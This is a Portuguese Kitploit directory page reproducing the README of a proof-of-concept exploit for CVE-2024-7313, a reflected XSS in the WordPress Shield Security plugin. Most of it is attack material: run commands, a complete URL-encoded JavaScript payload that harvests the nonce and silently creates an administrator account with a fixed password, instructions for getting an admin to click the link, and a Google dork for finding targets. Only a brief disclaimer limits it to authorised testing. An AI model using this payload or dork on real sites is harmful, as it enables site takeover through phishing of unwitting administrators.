Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-7313 — Prova de Conceito Personalizada em XSS para Criação de Conta de Administrador Não Autorizada via Plugin do WordPress Shield Security < 20.0.6 | Kitploit
Ferramentas/GitHubGitHub/wayne-ker/cve-2024-7313
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubwayne-ker/cve-2024-7313

CVE-2024-7313

Prova de Conceito Personalizada em XSS para Criação de Conta de Administrador Não Autorizada via Plugin do WordPress Shield Security < 20.0.6

Ver Repositório
31há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploração de Vulnerabilidade no Plugin Shield Security (CVE-2024-7313)

Kali Linux Works on My Machine Sleep Deprivation

Visão Geral

Este repositório contém um script PoC em Python projetado para explorar uma vulnerabilidade de XSS refletido no plugin Shield Security para WordPress, afetando versões anteriores à 20.0.6. A vulnerabilidade (CVE-2024-7313) permite que um atacante crie um link malicioso personalizado para o alvo, que, quando clicado por um administrador, cria uma conta de administrador não autorizada via XSS. O script detecta automaticamente instalações vulneráveis e gera um payload para explorar a vulnerabilidade.

Informações da Vulnerabilidade

  • CVE: CVE-2024-7313
  • Plugin: Shield Security < 20.0.6
  • Severidade: Alta
  • Sistemas Afetados: Sites WordPress que usam o plugin Shield Security versões < 20.0.6
  • Tipo de Ataque: Cross-Site Scripting Refletido (XSS)
  • Data de Publicação: 7 de agosto de 2024
  • OWASP TOP-10: A7: Cross-Site Scripting (XSS)

Uso

Pré-requisitos

  • Python 3.x
  • Bibliotecas requests e beautifulsoup4

Instale as bibliotecas necessárias usando:

root@kitploit:~
pip install requests beautifulsoup4

Executando o Script

  1. Clone o repositório:
root@kitploit:~
git clone https://github.com/Wayne-Ker/CVE-2024-7313.git
cd CVE-2024-7313
  1. Execute o script com a URL alvo:
root@kitploit:~
python3 exploit.py <url_alvo>

Exemplo:

root@kitploit:~
python3 exploit.py http://127.0.0.1

Após inserir os detalhes necessários para o novo usuário administrador (nome de usuário, email, primeiro nome, último nome), o script gerará uma URL do payload. Você pode colar esta URL no seu navegador para executar o ataque de XSS refletido, que criará um novo usuário administrador no site WordPress.

  1. Exemplo de Saída:
root@kitploit:~
#############################################################################
#                                                                           #
#                                                                           #
#   ______     _______     ____   ___ ____  _  _       _____ _____ _ _____  #
#  / ___\ \   / | ____|   |___ \ / _ |___ \| || |     |___  |___ // |___ /  #
# | |    \ \ / /|  _| _____ __) | | | |__) | || |_ _____ / /  |_ \| | |_ \  #
# | |___  \ V / | |__|_____/ __/| |_| / __/|__   _|_____/ /  ___) | |___) | #
#  \____|  \_/  |_____|   |_____|\___|_____|  |_|      /_/  |____/|_|____/  #
#                                                                           #
#    Shield Security Plugin Vulnerability (CVE-2024-7313)                   #
#    Reflected XSS in WordPress Shield Security Plugin                      #
#    Versions Affected: < 20.0.6                                            #
#    Risk: High                                                             #
#    Developed by: Wayne-Kerr                                              #
#    Published: August 7, 2024                                              #
############################################################################# 
A versão do Shield Security está vulnerável. Vamos continuar.
Digite o nome de usuário: nome_falso
Digite o email: [email protected]
Digite o primeiro nome: Haxor
Digite o último nome: teste

Usando senha fixa: HaxorStrongAFPassword123!!

URL do Payload XSS Gerada: http://127.0.0.1/wp-admin/admin.php?page=icwp-wpsf-plugin&nav=dashboard&nav_sub=%3Cscript%3Evar%20xhrNonce%20%3D%20new%20XMLHttpRequest%28%29%3B%20xhrNonce.open%28%27GET%27%2C%20%27/wp-admin/user-new.php%27%2C%20true%29%3B%20xhrNonce.onload%20%3D%20function%28%29%20%7B%20if%20%28xhrNonce.status%20%3D%3D%3D%20200%29%20%7B%20var%20nonce%20%3D%20xhrNonce.responseText.match%28/name%3D%22_wpnonce_create-user%22%20value%3D%22%28%5Ba-zA-Z0-9%5D%2B%29%22/%29%5B1%5D%3B%20var%20xhr%20%3D%20new%20XMLHttpRequest%28%29%3B%20xhr.open%28%27POST%27%2C%20%27/wp-admin/user-new.php%27%2C%20true%29%3B%20xhr.setRequestHeader%28%27Content-Type%27%2C%20%27application/x-www-form-urlencoded%27%29%3B%20xhr.setRequestHeader%28%27Referer%27%2C%20%27http%3A//127.0.0.1/wp-admin/user-new.php%27%29%3B%20xhr.setRequestHeader%28%27Origin%27%2C%20%27http%3A//127.0.0.1%27%29%3B%20var%20params%20%3D%20%27action%3Dcreateuser%26_wpnonce_create-user%3D%27%20%2B%20nonce%20%2B%20%27%26_wp_http_referer%3D%252Fwp-admin%252Fuser-new.php%26user_login%3Dnick%26email%3Dnick%2540test.com%26first_name%3Dnick%26last_name%3Dtest%26url%3Dtest%26pass1%3DHaxorStrongAFPassword123%2521%2521%26pass2%3DHaxorStrongAFPassword123%2521%2521%26role%3Dadministrator%26createuser%3DAdd%2BNew%2BUser%27%3B%20xhr.send%28params%29%3B%20xhr.onload%20%3D%20function%28%29%20%7B%20if%20%28xhr.status%20%3D%3D%20200%29%20%7B%20console.log%28%27Admin%20user%20created%20successfully%27%29%3B%20window.location.href%20%3D%20%27http%3A//127.0.0.1/wp-admin/admin.php%3Fpage%3Dicwp-wpsf-plugin%26nav%3Ddashboard%26nav_sub%3Doverview%27%3B%20%7D%20else%20%7B%20console.log%28%27Error%20occurred%3A%20%27%20%2B%20xhr.statusText%29%3B%20%7D%20%7D%3B%20%7D%20else%20%7B%20console.log%28%27Error%20fetching%20nonce%3A%20%27%20%2B%20xhrNonce.statusText%29%3B%20%7D%20%7D%3B%20xhrNonce.send%28%29%3B%3C/script%3E

Assim que você visitar a URL do payload XSS gerada, a exploração será executada e um novo usuário administrador será criado no site WordPress alvo.

Menu de Ajuda

Você pode acessar o menu de ajuda executando:

root@kitploit:~
python3 exploit.py -h

Dork para Encontrar Sites Vulneráveis

Para identificar sites que estão usando o plugin vulnerável, você pode usar o seguinte dork:

root@kitploit:~
inurl:"/wp-content/plugins/wp-simple-firewall/"

Isso ajudará você a encontrar sites que têm o plugin Shield Security instalado. Observe que o número da versão não é publicamente visível, portanto, pode ser necessário teste manual.

Como Funciona

  • O script primeiro verifica se a instalação do WordPress alvo está usando uma versão vulnerável do plugin Shield Security, examinando a resposta da página wp-login.php.
  • Se a versão do plugin for vulnerável, ele prossegue para gerar um payload de XSS refletido que, quando executado, criará um novo usuário administrador com uma senha fixa.
  • O payload é criado para primeiro usar uma requisição GET para encontrar dinamicamente o nonce do WordPress usado para criação de conta, depois usar esse nonce para enviar uma requisição POST ao endpoint de criação de usuário com os detalhes do novo usuário fornecidos no script.
  • O payload é então codificado em URL e exibido para uso no ataque.
  • Uma vez enviado a um administrador do site e o link é clicado, um novo usuário Administrador será criado no site com os detalhes fornecidos pelo script. Tudo isso é feito em segundo plano, com o administrador phishing sendo redirecionado para o painel do Shield Security sem perceber a exploração em segundo plano.

Aviso Legal

Esta ferramenta é destinada apenas para fins educacionais e deve ser usada apenas em ambientes de teste de penetração autorizados. O acesso não autorizado ou o uso de sistemas que você não possui é ilegal. O autor não é responsável por qualquer uso indevido desta ferramenta.

Licença

Este projeto está licenciado sob a Licença MIT.

Baixar ferramenta